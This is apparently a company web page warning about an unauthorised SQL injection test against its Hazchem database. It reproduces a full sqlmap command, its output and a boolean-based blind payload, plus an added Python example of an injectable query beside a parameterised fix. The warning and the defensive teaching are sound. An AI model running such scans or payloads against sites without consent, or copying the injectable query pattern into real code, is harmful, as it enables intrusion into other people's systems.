Computers Ltd

Example of hacking

If you store data on a web server then you really need to stay on top of security and confidentiality. There are many people at the moment trying to hack sites to either steal the data or to gain financial reward for 'keeping quiet' on your lack of security. They try to hide this under a banner of 'ethical hacking'.

Here is an example from our own web site: we were contacted with information about a security lapse in our Hazchem database. The testing was done without our authorisation using a product called sqlmap, which is freely available on the internet.

We do not store any personal data on our web site but we have several databases containing non-personal data each with individual access usernames and passwords.

Here is what we got -

Description: this webpage
with this param
is sqli vulnerable
sqlmap poc
:~$ sudo /usr/local/bin/sqlmap --url= --data="formtext1=%27&formbutton1=Find+Code" --random-agent --dbms=mysql --level=5 --risk=3 --technique=B -p formtext1 -f --identify-waf --tamper=between --time-sec=120 --timeout=120 --drop-set-cookie
[sudo] Mot de passe de fakessh :
___ ___[(]_____ ___ ___ {}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_|
[!] legal disclaimer:
Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:11:48
[15:11:48] [INFO] loading tamper module 'between'
[15:11:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20060911 Firefox/' from file '/pentest/exploitation/sqlmap/txt/user-agents.txt'
[15:11:49] [WARNING] it appears that you have provided tainted parameter values ('formtext1='') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[15:11:53] [INFO] testing connection to the target URL
[15:11:54] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[15:11:54] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:11:55] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[15:12:00] [WARNING] WAF/IPS/IDS product hasn't been identified
[15:12:00] [INFO] testing if the target URL content is stable
[15:12:00] [INFO] target URL content is stable
[15:12:01] [WARNING] heuristic (basic) test shows that POST parameter 'formtext1' might not be injectable
[15:12:01] [INFO] testing for SQL injection on POST parameter 'formtext1'
[15:12:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:12:02] [WARNING] reflective value(s) found and filtering out
[15:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[15:13:15] [INFO] POST parameter 'formtext1' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="OF")
[15:13:15] [INFO] checking if the injection point on POST parameter 'formtext1' is a false positive
POST parameter 'formtext1' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 138 HTTP(s) requests:
Parameter: formtext1 (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: formtext1=-3642 OR 1039=1039&formbutton1=Find Code
[15:16:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:16:11] [INFO] testing MySQL
[15:16:13] [INFO] confirming MySQL
[15:16:16] [INFO] the back-end DBMS is MySQL
[15:16:16] [INFO] actively fingerprinting MySQL
[15:16:18] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache, PHP 5.5.38
back-end DBMS: active fingerprint: MySQL >= 5.5
[15:17:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
[*] shutting down at 15:17:01

This is a deliberate attempt at 'ethical' hacking, but it crosses the line. The program itself warns against its use without the prior approval of the site owner. There was nothing that was ever going to be taken from our site apart from a list of UNNO codes, which are openly available from the United Nations.
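As an added illustration (not code from the original page or from the site concerned), the following Python script models the flaw sqlmap reported above: a code-lookup query built by concatenating the POST field `formtext1` into SQL, beside a parameterised version that closes the hole. It assumes SQLite standing in for the site's MySQL back end, a hypothetical `hazchem` table with constructed rows, and a numeric comparison matching the shape of the payload sqlmap printed.

```python
"""Boolean-based blind SQL injection in a code-lookup form, and its fix.
Constructed example: SQLite stands in for MySQL; the hazchem table, its
columns and the handler logic are assumptions, not the site's code."""
import sqlite3

# Constructed sample rows standing in for a UN number / Hazchem lookup table.
SAMPLE_ROWS = [
    ("1203", "Gasoline", "3YE"),
    ("1017", "Chlorine", "2XE"),
    ("1005", "Ammonia, anhydrous", "2RE"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hazchem (unno TEXT, name TEXT, code TEXT)")
    conn.executemany("INSERT INTO hazchem VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, formtext1):
    # The flaw sqlmap found: the POST value is spliced into the statement,
    # so "OR 1039=1039" becomes part of the WHERE clause.
    sql = "SELECT unno, name, code FROM hazchem WHERE unno = " + formtext1
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, formtext1):
    # Parameterised query: the value is bound as data, never parsed as SQL.
    sql = "SELECT unno, name, code FROM hazchem WHERE unno = ?"
    return conn.execute(sql, (formtext1,)).fetchall()


def demo():
    """Row counts per case. A boolean-based blind probe compares the page for
    an always-true and an always-false condition (sqlmap's --string="OF" is
    that difference); the vulnerable handler answers them differently, the
    fixed one does not."""
    conn = make_db()
    true_probe = "-3642 OR 1039=1039"   # payload from the sqlmap output
    false_probe = "-3642 OR 1039=1040"  # the matching always-false probe
    return {
        "legit_fixed": len(lookup_fixed(conn, "1203")),          # normal lookup
        "vuln_true": len(lookup_vulnerable(conn, true_probe)),   # every row leaks
        "vuln_false": len(lookup_vulnerable(conn, false_probe)), # nothing returned
        "fixed_true": len(lookup_fixed(conn, true_probe)),
        "fixed_false": len(lookup_fixed(conn, false_probe)),
    }
```

Running `demo()` shows three rows for the true probe against the vulnerable handler and none in every other probe case, which is exactly the observable difference a blind injection test relies on.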

Our databases contain non-personal data, such as the Hazchem codes and place names in Ireland.

Yours may contain personal data, the security of which is paramount under GDPR. Be warned that there are people about who have little regard for the law and your rights.